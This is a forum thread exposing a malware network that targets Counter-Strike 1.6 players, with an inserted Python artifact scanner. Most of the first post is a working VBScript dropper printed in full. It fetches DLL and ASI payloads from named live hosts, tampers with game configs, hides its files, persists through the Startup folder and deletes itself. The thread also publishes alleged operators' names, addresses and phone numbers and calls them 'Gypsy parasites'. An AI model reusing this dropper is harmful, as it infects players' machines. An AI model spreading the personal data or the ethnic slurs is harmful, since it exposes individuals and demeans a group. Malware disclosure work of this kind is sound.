Analysis of the Gypsy slowhackers' network (being updated)

Here you can report cases of abuse, dishonest activity, slowhack use and other "offenses".

Post by sss »

Continuation of the post at http://amxmodx.lt/viewtopic.php?f=41&t=6840

The parasite uses methods such as infecting clients through farm servers, which become a botnet; sending files to the innocent client using a VB script and a CS launcher that serves as the injector for the downloaded DLLs; mangling the game files; and plenty of others.

Attached is an offline copy of the malicious files, in case the parasite happens to "cover its tracks". It was downloaded with the HTTrack program for analysis and as evidence. The files were taken from:



http://www.upload.ee/files/5405822/web_ ... k.rar.html


ms-shadow.ro/NexonUp
stockdownload.eu/NexonCs
vipsmiley.cf/NexonCs



One of the parasites' files:

Code:

Sub unProtectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 0 ' normal
    End If
End Sub

Sub protectFile( filename )
    dim readfile, filesys
    set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        set readfile = filesys.GetFile( filename )
        readfile.Attributes = 7 ' hidden + system + readonly
    End If
End Sub

Sub DeleteAFile( filename )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( filename ) Then
        unProtectFile( filename )
        filesys.DeleteFile( filename ), True
    End If
End Sub

Sub RenameFile( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")

    If filesys.FileExists( oldName ) Then
        filesys.MoveFile oldName, newName
    End If
End Sub

Sub ClearCFG( path )
    DeleteAFile path
    Set objFSO = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFSO.CreateTextFile(path, ForWriting)
    objFile.Write ""
    objFile.Close

    protectFile path
End Sub

Sub DeleteAFolder( foldername )
    Dim filesys
    Set filesys = CreateObject("Scripting.FileSystemObject")

    If filesys.FolderExists( foldername ) Then
        ' unProtectFile( foldername )
        filesys.DeleteFolder( foldername ), True
    End If
End Sub

Sub RenameFolder( oldName, newName )
    Dim filesys
    Set filesys = WScript.CreateObject("Scripting.FileSystemObject")

    If filesys.FolderExists( oldName ) Then
        filesys.MoveFolder oldName, newName
    End If
End Sub

strURL="http://ms-shadow.ro/NexonUp/GTProtector.dll?" & Rnd
On Error Resume Next
    Set xml = CreateObject("Microsoft.XMLHTTP")
    xml.Open "GET", strURL, False
    xml.Send

    If Err.Number <> 0 Then
        WScript.Quit    ' if file download fails, quit script
    Else
        set oStream = createobject("Adodb.Stream")
        oStream.type = 1 ' adTypeBinary
        oStream.open
        oStream.write xml.responseBody

        ' overwrite
        oStream.savetofile "GTProtector.dll.upk", 2 ' adSaveCreateOverWrite
        oStream.close

        set oStream = nothing
        Set xml = Nothing
    End If
    Err.Clear
On Error Goto 0

strURL="http://ms-shadow.ro/NexonUp/GTProtector.asi?" & Rnd
On Error Resume Next
    Set xml = CreateObject("Microsoft.XMLHTTP")
    xml.Open "GET", strURL, False
    xml.Send

    If Err.Number <> 0 Then
        WScript.Quit    ' if file download fails, quit script
    Else
        set oStream = createobject("Adodb.Stream")
        oStream.type = 1 ' adTypeBinary
        oStream.open
        oStream.write xml.responseBody

        ' overwrite
        oStream.savetofile "GTProtector.asi.upk", 2 ' adSaveCreateOverWrite
        oStream.close

        set oStream = nothing
        Set xml = Nothing
    End If
    Err.Clear
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GTProtector.ini?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "GTProtector.ini.upk"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("GTProtector.ini.upk", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("GTProtector.ini.upk")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\rev_MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\rev_MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\rev_MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://stockdownload.eu/NexonUp/MasterServers.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\rev_MasterServers.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\rev_MasterServers.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\rev_MasterServers.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "config\ServerBrowser.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("config\ServerBrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("config\ServerBrowser.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/ServerBrowser.vdf?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "platform\config\ServerBrowser.vdf"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("platform\config\ServerBrowser.vdf", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("platform\config\ServerBrowser.vdf")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/GameMenu.res?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\resource\GameMenu.res"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\resource\GameMenu.res", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\resource\GameMenu.res")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/userconfig.cfg?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\userconfig.cfg"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\userconfig.cfg", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\userconfig.cfg")
    End If
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\motd_temp.html.old"
        RenameFile "cstrike\motd_temp.html", "cstrike\motd_temp.html.old"
        DeleteAFile "cstrike\motd_temp.html"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\motd_temp.html", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\motd_temp.html")
    End If
On Error Goto 0

On Error Resume Next
    ClearCFG "cstrike\hw\geforce.cfg"
    ClearCFG "cstrike\hw\opengl.cfg"
    ClearCFG "cstrike\autoexec.cfg"
    ' ClearCFG "cstrike\userconfig.cfg"
    ClearCFG "cstrike\valve.rc"

    ClearCFG "valve\hw\geforce.cfg"
    ClearCFG "valve\hw\opengl.cfg"
    ClearCFG "valve\valve.rc"
On Error Goto 0

CreateObject("WScript.Shell").Run("taskkill /f /im hl.exe")

WScript.Sleep(3000)

On Error Resume Next
    DeleteAFolder "cstrike\bin_old"
    DeleteAFile "cstrike\bin_old"

    DeleteAFile "GTProtector.dll.old"
    DeleteAFile "GTProtector.asi.old"
    DeleteAFile "GTProtector.ini.old"

    RenameFolder "cstrike\bin", "cstrike\bin_old"
    RenameFile "cstrike\bin", "cstrike\bin_old"

    RenameFile "GTProtector.dll", "GTProtector.dll.old"
    RenameFile "GTProtector.asi", "GTProtector.asi.old"
    RenameFile "GTProtector.ini", "GTProtector.ini.old"

    RenameFile "GTProtector.dll.upk", "GTProtector.dll"
    RenameFile "GTProtector.asi.upk", "GTProtector.asi"
    RenameFile "GTProtector.ini.upk", "GTProtector.ini"

    protectFile("GTProtector.dll")
    protectFile("GTProtector.asi")
    protectFile("GTProtector.ini")

    protectFile("cstrike\liblist.gam")

    DeleteAFile "cstrike\bin\TrackerUI.dll"
    DeleteAFile "valve\bin\TrackerUI.dll"
    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll"
    DeleteAFile "NexonUp.asi"
    DeleteAFile "CsShield.dll"

    RenameFile "cstrike\bin\TrackerUI.dll", "cstrike\bin\TrackerUI.dll.old"
    RenameFile "valve\bin\TrackerUI.dll", "valve\bin\TrackerUI.dll.old"
    RenameFile "cstrike\cl_dlls\ParticleMan.dll", "cstrike\cl_dlls\ParticleMan.dll.old"
    RenameFile "NexonUp.asi", "NexonUp.asi.old"
    RenameFile "CsShield.dll", "CsShield.dll.old"

    DeleteAFile "cstrike\bin\TrackerUI.dll.old"
    DeleteAFile "valve\bin\TrackerUI.dll.old"
    DeleteAFile "cstrike\cl_dlls\ParticleMan.dll.old"
    DeleteAFile "NexonUp.asi.old"
    DeleteAFile "CsShield.dll.old"

    DeleteAFile "mssv55.asi.old"
    RenameFile "mssv55.asi", "mssv55.asi.old"

    DeleteAFile "msvv82.asi.old"
    RenameFile "msvv82.asi", "msvv82.asi.old"
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/motd_temp.html?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile "cstrike\bin"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile("cstrike\bin", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        protectFile("cstrike\bin")
    End If
On Error Goto 0

CreateObject("WScript.Shell").Run("hl.exe -steam -game cstrike -noforcemparms -noforcemaccel")

Sub Up()

Set objShell = Wscript.CreateObject("Wscript.Shell")
strPath = objShell.SpecialFolders("StartUp")
strMyPath = strPath & "\"

On Error Resume Next
Dim filesys
Set filesys = CreateObject("Scripting.FileSystemObject")
filesys.DeleteFile( strMyPath & "*.vbs" ), True
On Error Goto 0

On Error Resume Next
    Set objHTTP = CreateObject("MSXML2.XMLHTTP")
    Call objHTTP.Open("GET", "http://ms-shadow.ro/NexonUp/NexonUp.vbs?" & Rnd, FALSE)
    objHTTP.Send

    If Err.Number <> 0 Then

    Else
        DeleteAFile strMyPath & "NexonUp.vbs"
        Set objFSO = CreateObject("Scripting.FileSystemObject")
        Set objFile = objFSO.CreateTextFile(strMyPath & "NexonUp.vbs", ForWriting)
        objFile.Write objHTTP.ResponseText
        objFile.Close
        ' protectFile(strMyPath & "NexonUp.vbs")
    End If
On Error Goto 0

CreateObject("WScript.Shell").Run(Chr(34) & strMyPath & "NexonUp.vbs" & Chr(34))

End Sub

Up()

On Error Resume Next
    WScript.Sleep 1000
    Set fileSystem = CreateObject("Scripting.FileSystemObject")
    thisScript = Wscript.ScriptFullName
    fileSystem.DeleteFile(thisScript)
On Error Goto 0

Main project, the parasite's head, to which the traffic flows: indungi.ro

Side projects:

bestia.ro
csgofade.net
ms-boost.com
ms-shadow.ro
vipsmiley.cf
stockdownload.eu


Members:

anaconda, unpack, according to http://www.extreamcs.com/

Members' domain registration info:

Admin Name: Costinel Danut Onofrei
Admin Organization: N/A
Admin Street: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin City: Iasi,Comuna Mogosesti-Siret,Strada Tudor Vladimirescu
Admin State/Province: Iasi
Admin Postal Code: 73579
Admin Country: RO
Admin Phone: +40.0752811205
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: [email protected]
_
Registrant Name: Emran Costin
Registrant Organization: CSGOFADE.NET
Registrant Street: Germany Germany
Registrant City: Germany
Registrant State/Province: Iasi
Registrant Postal Code: 73579
Registrant Country: RO
Registrant Phone: +00.34123232521
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: [email protected]
Registry Admin ID:

An interesting link:

stockdownload.eu/NexonPanel



This post is intended for educational purposes, to drag the parasites into the light of day; any use of the files to infect a client is punishable by law.
"Give me control of a nation's money and I care not who makes it's laws" — Mayer Amschel Bauer Rothschild
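
Added example, not part of the original post or of the files it quotes: a triage check that looks in a CS 1.6 install folder for the artifacts the VBScript above leaves behind (dropped GTProtector files, `cstrike\bin` turned into a file, emptied configs, hidden+system+readonly attributes) and lists `.vbs` files in a Startup folder. File names are taken from the quoted script; the function names `scan_install` and `scan_startup` are hypothetical, and the attribute test only has an effect on Windows.

```python
from pathlib import Path

# Artifact names taken from the VBScript quoted in the post above.
DROPPED = ["GTProtector.dll", "GTProtector.asi", "GTProtector.ini"]
REPLACED = [
    "config/MasterServers.vdf", "config/rev_MasterServers.vdf",
    "platform/config/MasterServers.vdf", "platform/config/rev_MasterServers.vdf",
    "config/ServerBrowser.vdf", "platform/config/ServerBrowser.vdf",
    "cstrike/resource/GameMenu.res", "cstrike/userconfig.cfg",
    "cstrike/motd_temp.html",
]
EMPTIED = [
    "cstrike/hw/geforce.cfg", "cstrike/hw/opengl.cfg", "cstrike/autoexec.cfg",
    "cstrike/valve.rc", "valve/hw/geforce.cfg", "valve/hw/opengl.cfg",
    "valve/valve.rc",
]
HSR = 0x1 | 0x2 | 0x4  # readonly + hidden + system: the script's "Attributes = 7"


def is_locked(path):
    """True if the file carries all three attributes (only reported on Windows)."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    return attrs & HSR == HSR


def scan_install(root):
    """Return (relative_path, reason) findings for a CS 1.6 install folder."""
    root = Path(root)
    findings = []
    for name in DROPPED:
        for suffix in ("", ".old", ".upk"):
            if (root / (name + suffix)).is_file():
                findings.append((name + suffix, "file dropped by the script"))
    # The script renames the cstrike\bin folder and writes a *file* in its place.
    if (root / "cstrike/bin").is_file():
        findings.append(("cstrike/bin", "folder replaced by a file"))
    if (root / "cstrike/bin_old").exists():
        findings.append(("cstrike/bin_old", "original bin folder moved aside"))
    for rel in EMPTIED:
        p = root / rel
        if p.is_file() and p.stat().st_size == 0:
            findings.append((rel, "config emptied"))
    for rel in DROPPED + REPLACED + EMPTIED:
        p = root / rel
        if p.is_file() and is_locked(p):
            findings.append((rel, "hidden+system+readonly set"))
    return findings


def scan_startup(startup_dir):
    """List .vbs files in a Startup folder; the script re-drops NexonUp.vbs there."""
    return sorted(p.name for p in Path(startup_dir).glob("*.vbs"))
```

A zero-length `autoexec.cfg` can also be benign, so treat the "config emptied" findings as supporting evidence next to the dropped files rather than as proof on their own.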

Post by laimiukas3 »

The infected files are downloaded from here:

Code:

http://ms-shadow.ro/cstrikex/cstrike/

Post by InvIs2 »

Well, this really is your area, but is there any point in trying to change something if it's not even an LT project? It's a silly question anyway, because I really don't understand; I'm asking seriously.


Post by sss »

1. To change anything legally you have to go through enormous bureaucratic labyrinths and dozens of institutions; it takes 2-3 years or longer, plus it requires 300 hours of work depending on the scope, and as a result everything becomes pointless.
2. Stopping the parasites by using their own methods against them is very effective, but there is a big legal wall, and once you hit it there is no way back; so even with very good intentions and goals, these days your hands are tied, not to mention freedom of speech.
3. Publicize everything for educational purposes, warn people about the possible dangers, the projects and their owners, the players.

In "slowhack" terms this project goes beyond any limits of common sense and is probably the biggest parasite in the whole CS 1.6 community: like a cancer, it infects innocent players and makes attempts on various projects (I personally had to deal with DDoS attacks and deliberate fake-user advertising from precisely this project back in 2012). The owner and the group of parasitic Gypsy individuals, who have certainly been working on this for more than 2 or 5 years, are educated enough and able to use their knowledge for bad purposes, as I have already mentioned.

Post by beast »

Does this affect Steam CS?


Post by sss »

beast wrote: Does this affect Steam CS?
Yes, it is vulnerable.

Post by laimiukas3 »

Server creators all go for non-Steam here anyway; if it disappeared, CS would die right away :) so I think it's an idiotic question.

Post by sss »

laimiukas3 wrote: Server creators all go for non-Steam here anyway; if it disappeared, CS would die right away :) so I think it's an idiotic question.
On the contrary, there would be fewer parasites, and if Valve took control of the third-party servers into its own hands there would be no more "businessmen" who are wrecking the whole community.

Post by laimiukas3 »

sss wrote:
laimiukas3 wrote: Server creators all go for non-Steam here anyway; if it disappeared, CS would die right away :) so I think it's an idiotic question.
On the contrary, there would be fewer parasites, and if Valve took control of the third-party servers into its own hands there would be no more "businessmen" who are wrecking the whole community.
Only if this game became free on Steam.

Post by sss »

laimiukas3 wrote:
sss wrote:
laimiukas3 wrote: Server creators all go for non-Steam here anyway; if it disappeared, CS would die right away :) so I think it's an idiotic question.
On the contrary, there would be fewer parasites, and if Valve took control of the third-party servers into its own hands there would be no more "businessmen" who are wrecking the whole community.
Only if this game became free on Steam.
CS:GO on Steam already has 4-8x more players than CS 1.6 Steam and non-Steam put together. CS 1.6 is no longer supported by its developers and has nothing to offer players, and the third-party community servers mostly belong to parasites.